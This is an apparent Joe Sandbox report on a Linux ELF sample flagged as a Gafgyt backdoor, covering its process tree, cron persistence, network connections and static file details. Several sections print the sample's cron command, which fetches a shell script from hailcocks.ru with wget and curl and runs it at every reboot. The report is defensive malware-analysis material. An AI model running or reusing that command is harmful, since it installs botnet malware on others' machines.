Edit tour

Linux Analysis Report
nshsh4.elf

Overview

General Information

Sample name:	nshsh4.elf
Analysis ID:	1542853
MD5:	abc6baddfa99634d1fc0b44be7aa4da0
SHA1:	dc2bd0805cf42c3cc58cb4ac0eca083ef7790795
SHA256:	6842684059ec919a5960bd49053831ea2b1902e6a747b9386895bc1690161238
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Connects to many ports of the same IP (likely port scanning)

Executes the "crontab" command typically for achieving persistence

Sample tries to persist itself using cron

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Found strings indicative of a multi-platform dropper

Sample has stripped symbol table

Sample listens on a socket

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542853
Start date and time:	2024-10-26 19:11:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	nshsh4.elf
Detection:	MAL
Classification:	mal60.troj.linELF@0/1@23/0

Warnings

VT rate limit hit for: nshsh4.elf

Runtime Messages

Command:	/tmp/nshsh4.elf
PID:	6253
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	you are now apart of hail cock botnet
Standard Error:	no crontab for root

Process Tree

system is lnxubuntu20

nshsh4.elf (PID: 6253, Parent: 6176, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/nshsh4.elf

nshsh4.elf New Fork (PID: 6255, Parent: 6253)

sh (PID: 6255, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

sh New Fork (PID: 6257, Parent: 6255)

sh New Fork (PID: 6259, Parent: 6257)

crontab (PID: 6259, Parent: 6257, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 6258, Parent: 6255)

crontab (PID: 6258, Parent: 6255, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

nshsh4.elf New Fork (PID: 6260, Parent: 6253)

nshsh4.elf New Fork (PID: 6303, Parent: 6260)

nshsh4.elf New Fork (PID: 6262, Parent: 6253)

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: nshsh4.elf

ReversingLabs: Detection: 23%

Source: tmp.L3xqaq.18.dr

String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 195.133.92.51 ports 3,4,5,6,6435,6735
Source: global traffic	TCP traffic: 193.233.193.45 ports 1,2,3,4,6,14623
Source: global traffic	TCP traffic: 88.151.195.22 ports 7830,2,3,25385,5,8
Source: global traffic	TCP traffic: 81.29.149.178 ports 15394,7362,1,3,4,5,9,6999,7869
Source: global traffic	TCP traffic: 91.149.238.18 ports 13529,1,2,3,5,9

Source: global traffic	TCP traffic: 192.168.2.23:33524 -> 88.151.195.22:25385
Source: global traffic	TCP traffic: 192.168.2.23:53156 -> 91.149.218.232:17134
Source: global traffic	TCP traffic: 192.168.2.23:40970 -> 195.133.92.51:6435
Source: global traffic	TCP traffic: 192.168.2.23:46098 -> 81.29.149.178:15394
Source: global traffic	TCP traffic: 192.168.2.23:36488 -> 185.82.200.181:6718
Source: global traffic	TCP traffic: 192.168.2.23:49520 -> 91.149.238.18:13529
Source: global traffic	TCP traffic: 192.168.2.23:55186 -> 31.13.248.89:22472
Source: global traffic	TCP traffic: 192.168.2.23:42280 -> 193.233.193.45:14623

Source: /tmp/nshsh4.elf (PID: 6253)

Socket: 127.0.0.1:1172

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	UDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknown	UDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknown	UDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknown	UDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknown	UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown	UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown	UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown	UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown	UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown	UDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknown	UDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknown	UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown	UDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknown	UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown	UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown	UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown	UDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknown	UDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknown	UDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknown	UDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknown	UDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknown	UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown	UDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknown	UDP traffic detected without corresponding DNS query: 80.152.203.134

Source: global traffic

DNS traffic detected: DNS query: kingstonwikkerink.dyn

Source: tmp.L3xqaq.18.dr

String found in binary or memory: http://hailcocks.ru/wget.sh;

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal60.troj.linELF@0/1@23/0

Persistence and Installation Behavior

Executes the "crontab" command typically for achieving persistence

Source: /bin/sh (PID: 6259)	Crontab executable: /usr/bin/crontab -> crontab -l			Jump to behavior
Source: /bin/sh (PID: 6258)	Crontab executable: /usr/bin/crontab -> crontab -			Jump to behavior

Sample tries to persist itself using cron

Source: /usr/bin/crontab (PID: 6258)	File: /var/spool/cron/crontabs/tmp.L3xqaq			Jump to behavior
Source: /usr/bin/crontab (PID: 6258)	File: /var/spool/cron/crontabs/root			Jump to behavior

Source: /tmp/nshsh4.elf (PID: 6255)

Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

Jump to behavior

Source: submitted sample

Stderr: no crontab for root: exit code = 0

Source: /tmp/nshsh4.elf (PID: 6253)

Queries kernel information via 'uname':

Jump to behavior

Source: nshsh4.elf, 6253.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6260.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6303.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: nshsh4.elf, 6253.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6260.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6303.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp	Binary or memory string: U5!/etc/qemu-binfmt/sh4
Source: nshsh4.elf, 6253.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6260.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6303.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp	Binary or memory string: rx86_64/usr/bin/qemu-sh4/tmp/nshsh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshsh4.elf
Source: nshsh4.elf, 6253.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6260.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6303.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sh4
Source: nshsh4.elf, 6303.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	Direct Volume Access	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
nshsh4.elf	24%	ReversingLabs	Linux.Backdoor.Gafgyt

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kingstonwikkerink.dyn	194.87.198.29	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://hailcocks.ru/wget.sh;	tmp.L3xqaq.18.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.82.200.181	unknown	Netherlands	60117	HSAE	false
195.133.92.51	unknown	Russian Federation	197695	AS-REGRU	true
193.233.193.45	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.149.218.232	unknown	Poland	198401	GECKONET-ASPL	false
31.13.248.89	unknown	Bulgaria	34224	NETERRA-ASBG	false
88.151.195.22	unknown	Azerbaijan	15723	AZERONLINEAZ	true
81.29.149.178	unknown	Switzerland	39616	COMUNICA_IT_SERVICESCH	true
91.149.238.18	unknown	Poland	41952	MARTON-ASPL	true
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.82.200.181	harm4.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	arm4.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Unknown	Browse
195.133.92.51	harm4.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
193.233.193.45	harm4.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	hmips.elf	Get hash	malicious	Unknown	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.149.218.232	harm4.elf	Get hash	malicious	Unknown	Browse
	ppc.elf	Get hash	malicious	Unknown	Browse
	x86.elf	Get hash	malicious	Unknown	Browse
31.13.248.89	harm4.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	arm4.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
kingstonwikkerink.dyn	harm4.elf	Get hash	malicious	Unknown	Browse	31.13.248.89
	mips.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	arm.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	hmips.elf	Get hash	malicious	Unknown	Browse	194.87.198.29
	arm7.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	mpsl.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	ppc.elf	Get hash	malicious	Unknown	Browse	88.151.195.22
	mips.elf	Get hash	malicious	Unknown	Browse	88.151.195.22
	arm5.elf	Get hash	malicious	Unknown	Browse	88.151.195.22

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INIT7CH	mips.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	c0r0n4x.mips.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	c0r0n4x.mpsl.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	a.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	.i.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	.i.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	bin.sh.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	LxyPEKz4ts.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	arm5.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	main_x86_64.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
HSAE	harm4.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	mips.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	mpsl.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	arm4.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	Copia r#U00e1pida del pago INV 00932024.exe	Get hash	malicious	AgentTesla	Browse	194.36.191.196
	SecuriteInfo.com.Heur.27949.8326.docx	Get hash	malicious	Unknown	Browse	185.82.202.150
	Proforma Invoice NOCAP PLASTIK AMBALA.exe	Get hash	malicious	AgentTesla	Browse	194.36.191.196
	ynwj.ps1	Get hash	malicious	Unknown	Browse	194.36.191.196
	na.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	RFQ SN00954666 for prosjekt CMC 40 fot container.exe	Get hash	malicious	AgentTesla	Browse	194.36.191.196
FREE-NET-ASFREEnetEU	harm4.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	mips.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	Rechnung_643839483.pdf.lnk	Get hash	malicious	Unknown	Browse	147.45.44.131
	hmips.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe	Get hash	malicious	Stealc, Vidar	Browse	147.45.44.221
	http://heks.egrowbrands.com/yuop/66e9b62daa62d_xin.exe	Get hash	malicious	Unknown	Browse	147.45.44.104
	http://hans.uniformeslaamistad.com/malesa/6705347f535f8_install.exe	Get hash	malicious	Unknown	Browse	147.45.44.104
	http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exe	Get hash	malicious	Unknown	Browse	147.45.44.104
	http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exe	Get hash	malicious	Unknown	Browse	147.45.44.104
	01oTkKQVSW.exe	Get hash	malicious	Unknown	Browse	147.45.47.185
AS-REGRU	harm4.elf	Get hash	malicious	Unknown	Browse	195.133.92.51
	mips.elf	Get hash	malicious	Unknown	Browse	195.133.92.51
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	212.24.61.227
	New orde.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	FACTURA A-7507_H1758.exe	Get hash	malicious	GuLoader	Browse	194.58.112.174
	P1 BOL.exe	Get hash	malicious	Unknown	Browse	37.140.192.179
	mips.elf	Get hash	malicious	Unknown	Browse	195.133.92.51
	z10982283782.exe	Get hash	malicious	DBatLoader, FormBook	Browse	194.58.112.174
	Invoice.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.58.112.174

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/var/spool/cron/crontabs/tmp.L3xqaq

Download File

Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	306
Entropy (8bit):	5.161770058934372
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQcBuZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJD:8QjHig8cMeHLUHYC+GABjnOGAFkz
MD5:	8C0471FB9E67E22555ADE017B3AECF27
SHA1:	FA5C4EE40A33E6657865BCE8AD3EE5E41ABCC849
SHA-256:	3A030EFF4E1D53BA3240E676FF46D57BC52A36802368E6FFE8AC0F0FB37B08FF
SHA-512:	F2AE247920516A9DA91E0D7E84055B22F17C3C7B307D6EA42070BEA4C6351082ACC3327E4BDD1F1BEEB749B99BB2E8D68AEFBFAD97F64CA62DD510523209AD97
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:11:59 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.

Static File Info

General

File type:	ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.88900670458556
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	nshsh4.elf
File size:	67'944 bytes
MD5:	abc6baddfa99634d1fc0b44be7aa4da0
SHA1:	dc2bd0805cf42c3cc58cb4ac0eca083ef7790795
SHA256:	6842684059ec919a5960bd49053831ea2b1902e6a747b9386895bc1690161238
SHA512:	0a11e845df4af4c21bdb49d6dbb65ab19c494b97a1b88883a7358aa02dcafc474b2c21dacde8321d9f1f8ac1097abf1431b1ee7432f60babc2cb2373e0939e8a
SSDEEP:	1536:rbuZ57jYrl72lUK7khRQ8N0CR80jmar8u:rbuD7j6Ab7r8N0rkmo8u
TLSH:	C5639D23DD3AAE98C1694AB0B4B18E756723E540D2470EBB1AA9C6759043FDCF1097FC
File Content Preview:	.ELF.....................@.4...........4. ...(...............@...@...........................B...B......T..........Q.td............................././"O.n........#.@........#.*@L....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	<unknown>
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4001a0
Flags:	0x9
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	67504
Section Header Size:	40
Number of Section Headers:	11
Header String Table Index:	10

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x30	0x0	0x6	AX	4
.text	PROGBITS	0x4000e0	0xe0	0xe960	0x0	0x6	AX	32
.fini	PROGBITS	0x40ea40	0xea40	0x24	0x0	0x6	AX	4
.rodata	PROGBITS	0x40ea64	0xea64	0x1964	0x0	0x2	A	4
.ctors	PROGBITS	0x4203cc	0x103cc	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x4203d4	0x103d4	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x4203e0	0x103e0	0x37c	0x0	0x3	WA	4
.got	PROGBITS	0x42075c	0x1075c	0x10	0x4	0x3	WA	4
.bss	NOBITS	0x42076c	0x1076c	0x510c	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x1076c	0x43	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x103c8	0x103c8	6.9373	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x103cc	0x4203cc	0x4203cc	0x3a0	0x54ac	2.8698	0x6	RW	0x10000	.ctors .dtors .data .got .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 19:11:59.456883907 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 26, 2024 19:12:04.832081079 CEST	42836	443	192.168.2.23	91.189.91.43
Oct 26, 2024 19:12:05.856023073 CEST	42516	80	192.168.2.23	109.202.202.202
Oct 26, 2024 19:12:15.430845976 CEST	33524	25385	192.168.2.23	88.151.195.22
Oct 26, 2024 19:12:15.436398983 CEST	25385	33524	88.151.195.22	192.168.2.23
Oct 26, 2024 19:12:15.436492920 CEST	33524	25385	192.168.2.23	88.151.195.22
Oct 26, 2024 19:12:15.436968088 CEST	33524	25385	192.168.2.23	88.151.195.22
Oct 26, 2024 19:12:15.442346096 CEST	25385	33524	88.151.195.22	192.168.2.23
Oct 26, 2024 19:12:15.442433119 CEST	33524	25385	192.168.2.23	88.151.195.22
Oct 26, 2024 19:12:15.447748899 CEST	25385	33524	88.151.195.22	192.168.2.23
Oct 26, 2024 19:12:16.396672964 CEST	25385	33524	88.151.195.22	192.168.2.23
Oct 26, 2024 19:12:16.396764040 CEST	33524	25385	192.168.2.23	88.151.195.22
Oct 26, 2024 19:12:16.396965981 CEST	33524	25385	192.168.2.23	88.151.195.22
Oct 26, 2024 19:12:20.446059942 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 26, 2024 19:12:30.684547901 CEST	42836	443	192.168.2.23	91.189.91.43
Oct 26, 2024 19:12:31.442256927 CEST	53156	17134	192.168.2.23	91.149.218.232
Oct 26, 2024 19:12:31.447680950 CEST	17134	53156	91.149.218.232	192.168.2.23
Oct 26, 2024 19:12:31.447770119 CEST	53156	17134	192.168.2.23	91.149.218.232
Oct 26, 2024 19:12:31.447808027 CEST	53156	17134	192.168.2.23	91.149.218.232
Oct 26, 2024 19:12:31.453164101 CEST	17134	53156	91.149.218.232	192.168.2.23
Oct 26, 2024 19:12:31.453264952 CEST	53156	17134	192.168.2.23	91.149.218.232
Oct 26, 2024 19:12:31.458590984 CEST	17134	53156	91.149.218.232	192.168.2.23
Oct 26, 2024 19:12:32.277232885 CEST	17134	53156	91.149.218.232	192.168.2.23
Oct 26, 2024 19:12:32.277267933 CEST	17134	53156	91.149.218.232	192.168.2.23
Oct 26, 2024 19:12:32.277436018 CEST	53156	17134	192.168.2.23	91.149.218.232
Oct 26, 2024 19:12:32.277436972 CEST	53156	17134	192.168.2.23	91.149.218.232
Oct 26, 2024 19:12:32.277543068 CEST	53156	17134	192.168.2.23	91.149.218.232
Oct 26, 2024 19:12:36.827687979 CEST	42516	80	192.168.2.23	109.202.202.202
Oct 26, 2024 19:12:37.308525085 CEST	40970	6435	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:37.313894987 CEST	6435	40970	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:37.313970089 CEST	40970	6435	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:37.314023972 CEST	40970	6435	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:37.319289923 CEST	6435	40970	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:37.319341898 CEST	40970	6435	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:37.324625015 CEST	6435	40970	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:38.221709967 CEST	6435	40970	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:38.221930027 CEST	40970	6435	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:38.222028971 CEST	40970	6435	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:43.274890900 CEST	57624	6735	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:43.280400038 CEST	6735	57624	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:43.280483007 CEST	57624	6735	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:43.280522108 CEST	57624	6735	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:43.285939932 CEST	6735	57624	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:43.286010027 CEST	57624	6735	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:43.291404009 CEST	6735	57624	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:44.982952118 CEST	6735	57624	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:44.983004093 CEST	6735	57624	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:44.983028889 CEST	6735	57624	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:44.983181000 CEST	57624	6735	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:44.983181000 CEST	57624	6735	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:44.983181000 CEST	57624	6735	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:44.983288050 CEST	57624	6735	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:44.984143972 CEST	6735	57624	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:44.984231949 CEST	57624	6735	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:44.985555887 CEST	6735	57624	195.133.92.51	192.168.2.23
Oct 26, 2024 19:12:44.985608101 CEST	57624	6735	192.168.2.23	195.133.92.51
Oct 26, 2024 19:12:50.020862103 CEST	46098	15394	192.168.2.23	81.29.149.178
Oct 26, 2024 19:12:50.026318073 CEST	15394	46098	81.29.149.178	192.168.2.23
Oct 26, 2024 19:12:50.026408911 CEST	46098	15394	192.168.2.23	81.29.149.178
Oct 26, 2024 19:12:50.026434898 CEST	46098	15394	192.168.2.23	81.29.149.178
Oct 26, 2024 19:12:50.031902075 CEST	15394	46098	81.29.149.178	192.168.2.23
Oct 26, 2024 19:12:50.031964064 CEST	46098	15394	192.168.2.23	81.29.149.178
Oct 26, 2024 19:12:50.037482977 CEST	15394	46098	81.29.149.178	192.168.2.23
Oct 26, 2024 19:12:50.916440964 CEST	15394	46098	81.29.149.178	192.168.2.23
Oct 26, 2024 19:12:50.916641951 CEST	46098	15394	192.168.2.23	81.29.149.178
Oct 26, 2024 19:12:50.916738987 CEST	46098	15394	192.168.2.23	81.29.149.178
Oct 26, 2024 19:12:55.949117899 CEST	36488	6718	192.168.2.23	185.82.200.181
Oct 26, 2024 19:12:55.954631090 CEST	6718	36488	185.82.200.181	192.168.2.23
Oct 26, 2024 19:12:55.954694033 CEST	36488	6718	192.168.2.23	185.82.200.181
Oct 26, 2024 19:12:55.954718113 CEST	36488	6718	192.168.2.23	185.82.200.181
Oct 26, 2024 19:12:55.960185051 CEST	6718	36488	185.82.200.181	192.168.2.23
Oct 26, 2024 19:12:55.960247040 CEST	36488	6718	192.168.2.23	185.82.200.181
Oct 26, 2024 19:12:55.965570927 CEST	6718	36488	185.82.200.181	192.168.2.23
Oct 26, 2024 19:12:58.642400980 CEST	6718	36488	185.82.200.181	192.168.2.23
